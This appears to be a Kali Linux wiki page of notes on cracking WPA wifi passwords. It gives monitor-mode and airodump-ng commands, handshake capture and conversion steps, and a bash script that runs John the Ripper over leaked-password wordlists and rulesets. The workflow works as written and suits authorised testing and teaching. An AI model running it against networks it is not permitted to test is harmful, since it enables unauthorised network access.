Reboot

Revisiting some of the old techniques.

Monitor wireless

First is aircrack to monitor wifi networks.

Start by putting the wifi card in monitor mode:

$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up

Now you can use that interface to scan for wireless network activity:

$ airodump-ng -i wlan1 -w output_file

This will output information about wireless network activity to a file.

Obtain handshakes

Next is besside to obtain handshakes.

Crack handshakes

Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.

$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw

Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:

#!/bin/sh

# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"

cap="wpa.cap"

pwdir="/root/box/08_besside"

# Round 0
rulesets=("")

#### Round 1
###rulesets=("KoreLogicRulesAppendYears")

#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt

wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work

for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** **  * * * ** ****"
    echo "* ** * *** **** ***  * ** ** *** * * * *** *"
    echo "  * ***** *  * * * *** * * * * *  ***  * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""

    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . .  ."
        echo "... ... .. ...... . .. .  . .   ....  .... ."
        echo "... .  .. .  .  .  .. .... . .  . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""

        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"

            if [ "${rules}" == "" ] ; then

                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
                cd ${mypwd}

            else
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules}  ${pwfile}"

                # actually do it
                mypwd=`pwd`
                cd ${johndir}
                ${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk  ${pwfile}
                cd ${mypwd}

            fi

        done
    done
done

Flags

Kali Linux "The quieter you become, the more you are able to hear." Penetration testing Linux distribution. Kali  · Category:Kali Kali/Wireless Reboot Kali Software: Kali Tools Kali Top 10 Aircrack  · Wireshark  · John the Ripper  · Nmap  · Metasploit Framework Dsniff  · Tcpdump  · Hydra  · Sqlmap  · Burpsuite  · Commix Dirbuster  · Valgrind Attack Workflow: Kali/Workflow 1 Physical Attacks: Kali/Layer 1 Attacks 2 Data/MAC Attacks: Kali/Layer 2 Attacks 3 Network Attacks: Kali/Layer 3 Attacks 4 Transport Attacks: Kali/Layer 4 Attacks 5 Session Attacks: Kali/Layer 5 Attacks 6 Presentation Attacks: Kali/Layer 6 Attacks 7 Application Attacks: Kali/Layer 7 Attacks Red Team Blue Team Metasploitable - Red Team Metasploitable - Blue Team Networking: Kali/Hotspot  · Kali/OpenVPN  · Kali/OpenVPN/Hotspot  · Kali/OpenVPN/PIA Kali/IPv6 Booting: Kali/Dual Boot OS X  · Kali/Live USB  · Kali/Persistent USB Installing: Kali/Installing  · Kali/Post Install  · Kali/Fixes Kali on Raspberry Pi: Kali Raspberry Pi  · Kali Raspberry Pi/Installing  · Kali Raspberry Pi/Headless  · Kali Raspberry Pi/Post-Install Category:Security  · Category:Wireless  · Category:Passwords  · Category:Man in the Middle  · Category:Evil Twin Flags  · Template:KaliFlag  · e

Wireless all things wireless. Wireless  · Category:Wireless Software: Scapy Flags  · Template:WirelessFlag  · e

aircrack-ng a suite of tools for wireless cracking. Aircrack  · Category:Aircrack aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information airodump-ng Basic Usage of Airodump Category:Security  · Category:Wireless  · Category:Passwords Flags  · Template:AircrackFlag  · e